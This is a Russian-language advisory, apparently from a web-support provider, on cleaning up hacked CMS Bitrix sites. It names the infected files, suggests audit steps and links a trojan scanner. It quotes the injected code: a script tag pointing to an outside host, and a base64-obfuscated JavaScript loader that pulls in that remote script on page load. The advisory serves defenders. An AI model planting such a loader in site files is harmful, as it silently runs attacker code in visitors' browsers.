В разгаре новая волна взломов CMS Bitrix.
Если ваш сайт работает на CMS Bitrix и на сайте наблюдается критическая ошибка, то необходимо:
-
Найти файл /bitrix/modules/main/include/prolog.php и проверить его на наличие строки:
<script src="https://storejscdn.pw/jqueryui.js"></script>
Адрес ссылки может отличаться. Как правило, код вставляется в самый конец файла, его нужно удалить.
-
Инъекцию также нужно удалить из файла /bitrix/js/main/core/core.js, в конце файла код вида:
\bs=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz`);document.head.appendChild(s);
- Далее, необходимо провести тщательный аудит безопасности, чтобы устранить уязвимости. Обновить ядро CMS Bitrix, предварительно проконсультировавшись с вашим разработчиком.
Если вам необходима консультация, пожалуйста, обращайтесь в нашу техническую поддержку.
[UPDATE после февральской атаки 2023г.]
1. удалить файл main.php
/bitrix/components/bitrix/main.file.input
2. проверить содержимое файла bx_root.php (сравнить с оригиналом)
\bitrix\modules\main\
3. проверить содержимое файла .htaccess (сравнить с оригиналом)
4. проверить содержимое файла index.php на подозрительный код в начале строки
5. проверить агенты на подозрительный код
6. очистить файлы кеша /bitrix/admin/cache/ и /bitrix/admin/managed_cache/
7. запустить скрипт проверки Поиск троянов
https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/